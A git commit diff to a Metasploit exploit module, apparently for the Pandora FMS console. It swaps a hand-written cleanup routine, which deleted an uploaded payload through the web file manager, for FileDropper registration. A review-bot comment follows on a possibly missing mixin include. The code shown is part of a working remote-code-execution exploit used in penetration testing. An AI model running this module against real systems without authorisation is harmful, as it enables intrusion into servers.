Use Msf::Exploit::FileDropper
parent
7fbd5b63b1
commit
4bbadc44d6
|
@ -281,6 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?("Upload correct")
|
||||
register_file_for_cleanup(@payload_name)
|
||||
print_status("#{peer} - Successfully uploaded payload")
|
||||
else
|
||||
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
|
||||
|
@ -310,80 +311,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Failure::Unknown, "#{peer} - Unable to perform remote code execution!")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def cleanup
|
||||
super
|
||||
return if @rce_failed
|
||||
|
||||
print_status("#{peer} - Cleaning script remnants")
|
||||
|
||||
# Extract hash and hash2 from response
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' => {
|
||||
'sec' => 'gsetup',
|
||||
'sec2' => 'godmode/setup/file_manager'
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body =~ /(?<=#{@payload_name}<)(.*)(?=<\/tr>)/m
|
||||
form = $1
|
||||
|
||||
# Extract hash
|
||||
if form =~ /(?<=name="hash" type="hidden" value=")(.*?)(?=" \/>)/
|
||||
hash = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract hash from response!")
|
||||
print_error("#{peer} - Upload will fail!")
|
||||
return false
|
||||
end
|
||||
|
||||
# Extract hash2
|
||||
if form =~ /(?<=name="hash2" type="hidden" value=")(.*?)(?=" \/>)/
|
||||
hash2 = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract hash2 from response!")
|
||||
print_error("#{peer} - Upload will fail!")
|
||||
return false
|
||||
end
|
||||
|
||||
# Extract real_directory
|
||||
if form =~ /(?<=filename" type="hidden" value=")(.*?)(?=" \/>)/
|
||||
filepath = $1
|
||||
else
|
||||
print_error("#{peer} - Could not extract real_directory from response! Falling back to default.")
|
||||
filepath = '/var/www/html/pandora_console/images/'
|
||||
end
|
||||
|
||||
|
||||
else
|
||||
print_error("#{peer} - Could not identify file manager form!")
|
||||
end
|
||||
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
'cookie' => @cookie,
|
||||
'uri' => normalize_uri(uri, "index.php"),
|
||||
'vars_get' => {
|
||||
'sec' => 'gsetup',
|
||||
'sec2' => 'godmode/setup/file_manager'
|
||||
},
|
||||
'vars_post' => {
|
||||
'filename' => filepath,
|
||||
'hash' => hash,
|
||||
'hash2' => hash2,
|
||||
'directory' => 'images',
|
||||
'delete_file' => 1
|
||||
}
|
||||
})
|
||||
|
||||
if res && res.code == 200 && res.body.include?('Success')
|
||||
print_status("#{peer} - Script removed successfully")
|
||||
else
|
||||
print_warning("#{peer} - Failed to remove #{@payload_name}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
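Review bot: `register_file_for_cleanup(@payload_name)` in the first hunk comes from the Msf::Exploit::FileDropper mixin, but neither visible hunk adds `include Msf::Exploit::FileDropper`, and the hunk offsets (-281 → +281) indicate no line was added higher up in the file. Unless the class already mixes it in, the call would raise NoMethodError right after a successful upload, so confirm the include is present near the top of the class. The removed `cleanup` deleted the file over HTTP through the file manager, whereas FileDropper, as far as I know, removes registered files through the opened session and resolves a bare filename against that session's working directory. The old fallback path suggests the file lands under `images/`, so check that the registered path matches that location and consider a comment such as `# removed by FileDropper via the session; stays on the host if no session opens` so the leftover-file case is visible to whoever has to clean the tested system. The enclosing method starts above the hunk, so this is judged from the visible lines only.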